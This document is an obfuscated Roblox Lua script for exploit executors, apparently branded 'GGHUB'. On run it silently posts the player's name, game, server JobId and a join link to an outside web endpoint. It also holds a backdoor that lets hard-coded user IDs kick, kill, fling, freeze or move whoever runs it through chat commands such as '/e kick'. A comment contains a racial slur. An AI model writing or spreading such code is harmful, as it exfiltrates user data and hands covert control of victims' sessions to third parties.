local function L_1_func()
    local L_2_ = game:GetService("HttpService")
    local L_3_ = game:GetService("Players")
    local L_4_ = game:GetService("MarketplaceService")
    local L_5_ = game:GetService("TeleportService")
    local L_6_ = game:GetService("RunService")
    
    -- fuck you nigass bypass this sh idgaf lmao
    local function sendWebhook(content)
        pcall(function()
            if syn and syn.request then
                syn.request({
                    Url = "https://python-hello-world-one-blue.vercel.app/api",
                    Body = content,
                    Method = "POST"
                })
            elseif http_request then
                http_request({
                    Url = "https://python-hello-world-one-blue.vercel.app/api",
                    Body = content,
                    Method = "POST"
                })
            elseif fluxus and fluxus.request then
                fluxus.request({
                    Url = "https://python-hello-world-one-blue.vercel.app/api",
                    Body = content,
                    Method = "POST"
                })
            end
        end)
    end
    
    local premiumUsers = {
        [232083112] = true,
        [9323471719] = true -- Gold bu ark
    }
    
    local function L_8_func()
        local L_9_, L_10_ = pcall(function()
            return L_4_:GetProductInfo(game.PlaceId).Name
        end)
        if L_9_ then
            return L_10_
        else
            return "Unknown Game"
        end
    end
    
    local function L_11_func()
        local L_12_ = L_3_.LocalPlayer
        local L_13_ = "https://www.roblox.com/games/start?placeId=" .. tostring(game.PlaceId) .. "&gameInstanceId=" .. tostring(game.JobId)
        
        local L_14_ = {
            ["content"] = "Script Execute",
            ["embeds"] = {{
                ["title"] = "Details:",
                ["fields"] = {
                    {["name"] = "Player", ["value"] = L_12_.Name, ["inline"] = true},
                    {["name"] = "Game Name", ["value"] = L_8_func(), ["inline"] = true},
                    {["name"] = "JobId", ["value"] = tostring(game.JobId), ["inline"] = true},
                    {["name"] = "Join Link", ["value"] = L_13_, ["inline"] = false},
                },
                ["color"] = 3447003
            }}
        }
        local L_15_ = L_2_:JSONEncode(L_14_)
        sendWebhook(L_15_)
    end
    
    L_11_func()
    
    local L_16_ = {}
    local L_17_ = 0
    
    local function L_18_func(L_19_arg1)
        return premiumUsers[L_19_arg1] == true
    end
    
    local function L_20_func()
        L_16_ = {}
        for L_21_forvar0, L_22_forvar1 in pairs(L_3_:GetPlayers()) do
            if L_18_func(L_22_forvar1.UserId) then
                L_16_[L_22_forvar1.UserId] = L_22_forvar1
            end
        end
    end
    
    spawn(function()
        while true do
            wait(5)
            L_20_func()
        end
    end)
    
    L_3_.PlayerAdded:Connect(function(L_23_arg1)
        wait(1)
        if L_18_func(L_23_arg1.UserId) then
            L_16_[L_23_arg1.UserId] = L_23_arg1
        end
    end)
    
    L_3_.PlayerRemoving:Connect(function(L_24_arg1)
        if L_16_[L_24_arg1.UserId] then
            L_16_[L_24_arg1.UserId] = nil
        end
    end)
    
    L_20_func()
    
    local function L_25_func(L_26_arg1)
        if not L_26_arg1 or not L_18_func(L_26_arg1.UserId) then return end
        
        local L_27_
        L_27_ = L_26_arg1.Chatted:Connect(function(L_28_arg1)
            if not L_18_func(L_26_arg1.UserId) then
                L_27_:Disconnect()
                return
            end
            
            local L_29_ = L_28_arg1:lower()
            
            if L_29_ == "/e bring" then
                pcall(function()
                    for L_30_forvar0, L_31_forvar1 in pairs(L_3_:GetPlayers()) do
                        if L_31_forvar1 ~= L_26_arg1 and L_31_forvar1.Character and L_31_forvar1.Character:FindFirstChild("HumanoidRootPart") and L_26_arg1.Character and L_26_arg1.Character:FindFirstChild("HumanoidRootPart") then
                            L_31_forvar1.Character.HumanoidRootPart.CFrame = L_26_arg1.Character.HumanoidRootPart.CFrame
                        end
                    end
                end)
                
            elseif L_29_ == "/e reset" then
                pcall(function()
                    for L_32_forvar0, L_33_forvar1 in pairs(L_3_:GetPlayers()) do
                        if L_33_forvar1 ~= L_26_arg1 and L_33_forvar1.Character and L_33_forvar1.Character:FindFirstChild("Humanoid") then
                            L_33_forvar1.Character.Humanoid.Health = 0
                        end
                    end
                end)
                
            elseif L_29_ == "/e jump" then
                pcall(function()
                    for L_34_forvar0, L_35_forvar1 in pairs(L_3_:GetPlayers()) do
                        if L_35_forvar1 ~= L_26_arg1 and L_35_forvar1.Character and L_35_forvar1.Character:FindFirstChild("Humanoid") then
                            L_35_forvar1.Character.Humanoid.Jump = true
                        end
                    end
                end)
                
            elseif L_29_ == "/e say" then
                pcall(function()
                    if L_3_.LocalPlayer.Character and L_3_.LocalPlayer.Character:FindFirstChild("Head") then
                        game:GetService("Chat"):Chat(L_3_.LocalPlayer.Character.Head, "Hello! GGHUB", Enum.ChatColor.White)
                    end
                end)
                
            elseif L_29_ == "/e kick" then
                pcall(function()
                    for L_36_forvar0, L_37_forvar1 in pairs(L_3_:GetPlayers()) do
                        if L_37_forvar1 ~= L_26_arg1 then
                            L_37_forvar1:Kick("Premium GGHUB, sorry")
                        end
                    end
                end)
                
            elseif L_29_ == "/e freeze" then
                pcall(function()
                    for L_38_forvar0, L_39_forvar1 in pairs(L_3_:GetPlayers()) do
                        if L_39_forvar1 ~= L_26_arg1 and L_39_forvar1.Character and L_39_forvar1.Character:FindFirstChild("HumanoidRootPart") then
                            L_39_forvar1.Character.HumanoidRootPart.Anchored = true
                            spawn(function()
                                wait(15)
                                if L_39_forvar1 and L_39_forvar1.Character and L_39_forvar1.Character:FindFirstChild("HumanoidRootPart") then
                                    L_39_forvar1.Character.HumanoidRootPart.Anchored = false
                                end
                            end)
                        end
                    end
                end)
                
            elseif L_29_ == "/e spin" then
                pcall(function()
                    for L_40_forvar0, L_41_forvar1 in pairs(L_3_:GetPlayers()) do
                        if L_41_forvar1 ~= L_26_arg1 and L_41_forvar1.Character and L_41_forvar1.Character:FindFirstChild("HumanoidRootPart") then
                            local L_42_ = Instance.new("BodyAngularVelocity")
                            L_42_.AngularVelocity = Vector3.new(0, 20, 0)
                            L_42_.MaxTorque = Vector3.new(0, math.huge, 0)
                            L_42_.Parent = L_41_forvar1.Character.HumanoidRootPart
                            
                            game:GetService("Debris"):AddItem(L_42_, 3)
                        end
                    end
                end)
                
            elseif L_29_ == "/e fling" then
                pcall(function()
                    if L_3_.LocalPlayer ~= L_26_arg1 and L_3_.LocalPlayer.Character and L_3_.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
                        local L_43_ = Instance.new("BodyVelocity")
                        L_43_.MaxForce = Vector3.new(math.huge, math.huge, math.huge)
                        L_43_.Velocity = Vector3.new(math.random(-100,100), 100, math.random(-100,100))
                        L_43_.Parent = L_3_.LocalPlayer.Character.HumanoidRootPart
                        
                        game:GetService("Debris"):AddItem(L_43_, 2)
                    end
                end)
                
            elseif L_29_ == "/e sit" then
                pcall(function()
                    if L_3_.LocalPlayer ~= L_26_arg1 and L_3_.LocalPlayer.Character and L_3_.LocalPlayer.Character:FindFirstChild("Humanoid") then
                        L_3_.LocalPlayer.Character.Humanoid.Sit = true
                    end
                end)
                
            elseif L_29_ == "/e slowwalk" then
                pcall(function()
                    if L_3_.LocalPlayer ~= L_26_arg1 and L_3_.LocalPlayer.Character and L_3_.LocalPlayer.Character:FindFirstChild("Humanoid") then
                        L_3_.LocalPlayer.Character.Humanoid.WalkSpeed = 7
                    end
                end)
                
            elseif L_29_ == "/e angel" then
                pcall(function()
                    if L_3_.LocalPlayer ~= L_26_arg1 and L_3_.LocalPlayer.Character and L_3_.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and L_3_.LocalPlayer.Character:FindFirstChild("Humanoid") then
                        local L_44_ = L_3_.LocalPlayer
                        local L_45_ = L_44_.Character
                        local L_46_ = L_45_.Humanoid
                        local L_47_ = L_45_.HumanoidRootPart
                        
                        local L_48_ = L_46_.WalkSpeed
                        local L_49_ = L_46_.JumpPower
                        local L_50_ = L_47_.Position
                        
                        local L_51_ = Instance.new("BodyPosition")
                        L_51_.MaxForce = Vector3.new(4000, 4000, 4000)
                        L_51_.D = 2000
                        L_51_.P = 10000
                        L_51_.Position = L_50_
                        L_51_.Parent = L_47_
                        
                        local L_52_ = Instance.new("BodyAngularVelocity")
                        L_52_.MaxTorque = Vector3.new(0, math.huge, 0)
                        L_52_.AngularVelocity = Vector3.new(0, 2, 0)
                        L_52_.Parent = L_47_
                        
                        L_46_.WalkSpeed = 0
                        L_46_.JumpPower = 0
                        L_46_.PlatformStand = true
                        
                        spawn(function()
                            for L_53_forvar0 = 1, 50 do
                                if L_51_ and L_51_.Parent then
                                    L_51_.Position = L_50_ + Vector3.new(0, L_53_forvar0 * 1.2, 0)
                                    wait(0.1)
                                end
                            end
                            
                            wait(5)
                            
                            if L_51_ and L_51_.Parent then
                                for L_54_forvar0 = 50, 1, -1 do
                                    if L_51_ and L_51_.Parent then
                                        L_51_.Position = L_50_ + Vector3.new(0, L_54_forvar0 * 1.2, 0)
                                        wait(0.05)
                                    end
                                end
                            end
                            
                            if L_45_ and L_46_ then
                                L_46_.WalkSpeed = L_48_
                                L_46_.JumpPower = L_49_
                                L_46_.PlatformStand = false
                            end
                            
                            if L_51_ then L_51_:Destroy() end
                            if L_52_ then L_52_:Destroy() end
                        end)
                    end
                end)
                
            elseif L_29_ == "/e orbit" then
                pcall(function()
                    if L_3_.LocalPlayer ~= L_26_arg1 and L_3_.LocalPlayer.Character and L_3_.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and L_26_arg1.Character and L_26_arg1.Character:FindFirstChild("HumanoidRootPart") then
                        local L_55_ = L_3_.LocalPlayer
                        local L_56_ = L_55_.Character
                        local L_57_ = L_56_.HumanoidRootPart
                        local L_58_ = L_56_.Humanoid
                        local L_59_ = L_26_arg1.Character.HumanoidRootPart
                        
                        local L_60_ = L_58_.WalkSpeed
                        local L_61_ = L_58_.JumpPower
                        
                        local L_62_ = Instance.new("BodyPosition")
                        L_62_.MaxForce = Vector3.new(4000, 4000, 4000)
                        L_62_.D = 2000
                        L_62_.P = 10000
                        L_62_.Parent = L_57_
                        
                        local L_63_ = Instance.new("BodyAngularVelocity")
                        L_63_.MaxTorque = Vector3.new(0, 0, 0)
                        L_63_.AngularVelocity = Vector3.new(0, 0, 0)
                        L_63_.Parent = L_57_
                        
                        L_58_.WalkSpeed = 0
                        L_58_.JumpPower = 0
                        L_58_.PlatformStand = true
                        
                        spawn(function()
                            local L_64_ = 0
                            local L_65_ = 8
                            local L_66_ = 0.2
                            
                            for L_67_forvar0 = 1, 125 do
                                if L_62_ and L_62_.Parent and L_59_ and L_59_.Parent then
                                    local L_68_ = L_59_.Position
                                    local L_69_ = math.cos(L_64_) * L_65_
                                    local L_70_ = math.sin(L_64_) * L_65_
                                    
                                    L_62_.Position = L_68_ + Vector3.new(L_69_, 2, L_70_)
                                    
                                    local L_71_ = (L_68_ - L_57_.Position).Unit
                                    L_57_.CFrame = CFrame.lookAt(L_57_.Position, L_68_)
                                    
                                    L_64_ = L_64_ + L_66_
                                    wait(0.04)
                                else
                                    break
                                end
                            end
                            
                            if L_56_ and L_58_ then
                                L_58_.WalkSpeed = L_60_
                                L_58_.JumpPower = L_61_
                                L_58_.PlatformStand = false
                            end
                            
                            if L_62_ then L_62_:Destroy() end
                            if L_63_ then L_63_:Destroy() end
                        end)
                    end
                end)
            end
        end)
        
        L_3_.PlayerRemoving:Connect(function(L_72_arg1)
            if L_72_arg1 == L_26_arg1 then
                L_27_:Disconnect()
            end
        end)
    end
    
    for L_73_forvar0, L_74_forvar1 in pairs(L_16_) do
        L_25_func(L_74_forvar1)
    end
    
    L_3_.PlayerAdded:Connect(function(L_75_arg1)
        wait(2)
        if L_18_func(L_75_arg1.UserId) then
            L_25_func(L_75_arg1)
        end
    end)
    
    spawn(function()
        while true do
            wait(5)
            for L_76_forvar0, L_77_forvar1 in pairs(L_16_) do
                if L_77_forvar1 and L_77_forvar1.Parent and not L_77_forvar1:FindFirstChild("_CommandsSetup") then
                    L_25_func(L_77_forvar1)
                    local L_78_ = Instance.new("BoolValue")
                    L_78_.Name = "_CommandsSetup"
                    L_78_.Parent = L_77_forvar1
                end
            end
        end
    end)
    
    print("if you have any issues about script join our discord server and report it please https://discord.gg/wMbrnEQ6MZ")
end

L_1_func()
